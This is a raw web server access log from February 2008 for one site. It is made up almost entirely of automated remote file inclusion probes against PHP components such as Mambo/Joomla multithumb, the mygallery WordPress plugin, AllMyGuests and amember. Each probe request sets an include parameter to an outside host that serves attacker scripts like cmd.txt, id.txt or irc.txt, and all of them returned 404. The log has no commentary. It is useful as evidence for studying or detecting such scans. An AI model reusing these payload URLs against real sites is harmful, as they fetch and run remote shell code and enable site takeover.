213.194.124.84 - - [10/Feb/2008:04:31:50 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:31:51 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:31:51 -0800] "GET /logs/access_080120.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:53 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:31:53 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:53 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:31:53 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:32:24 -0800] "GET /logs/access_080121.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:32:24 -0800] "GET /logs/access_080121.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [10/Feb/2008:04:32:27 -0800] "GET /logs/access_080121.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.66.162.71 - - [10/Feb/2008:04:32:28 -0800] "GET /classes/core/language.php?rootdir=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:32:30 -0800] "GET /logs/access_080130.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:32:30 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:32:31 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:32:32 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:32:32 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.200.89.66 - - [10/Feb/2008:04:32:35 -0800] "GET /logs/access_080121.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:33:06 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:33:07 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.19.15.138 - - [10/Feb/2008:04:33:16 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.19.15.138 - - [10/Feb/2008:04:33:17 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:33:24 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:33:24 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:33:29 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:33:29 -0800] "GET /logs/access_080120.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:33:29 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:33:30 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:33:34 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:33:35 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:09 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:10 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:10 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:14 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:14 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:34:14 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:34:18 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:34:18 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.151.215 - - [10/Feb/2008:04:34:25 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:34:43 -0800] "GET /index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:34:45 -0800] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:34:46 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:34:46 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:34:49 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:34:50 -0800] "GET /index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:34:51 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:34:54 -0800] "GET /logs/access_080118.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.233 - - [10/Feb/2008:04:34:54 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:35:01 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:35:01 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:35:15 -0800] "GET /logs/access_080106.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.163.195.49 - - [10/Feb/2008:04:35:25 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:35:31 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:35:31 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:35:32 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:35:33 -0800] "GET /convert/mvcw.php?step=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:35:33 -0800] "GET /logs/convert/mvcw.php?step=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:35:48 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:04:35:50 -0800] "GET /logs/access_080121.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:04:35:50 -0800] "GET //amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:04:35:50 -0800] "GET /logs//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:36:00 -0800] "GET /logs/access_080121.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:36:00 -0800] "GET //amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:36:00 -0800] "GET /logs//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:10 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:10 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:10 -0800] "GET /logs/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:18 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:18 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:36:19 -0800] "GET /logs/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:04:36:55 -0800] "GET /logs/access_080117.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:37:18 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [10/Feb/2008:04:37:20 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:37:25 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:37:38 -0800] "GET /logs/access_080120.log/convert/mvcw.php?step=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:37:46 -0800] "GET /logs/access_071224.log/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:37:48 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:37:48 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:37:49 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:37:50 -0800] "GET /logs/access_080117.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:37:53 -0800] "GET /logs/access_071224.log/index.php?pageurl=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:00 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:00 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:00 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:00 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:00 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:38:01 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:38:03 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:30 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:30 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:30 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:46 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:46 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:04:38:46 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:00 -0800] "GET /logs/access_080105.log/index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:00 -0800] "GET /logs/access_080105.log/index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:00 -0800] "GET /index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:00 -0800] "GET /index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:00 -0800] "GET /logs/index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [10/Feb/2008:04:39:01 -0800] "GET /logs/index.php?configFile=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:39:02 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:39:02 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:39:02 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
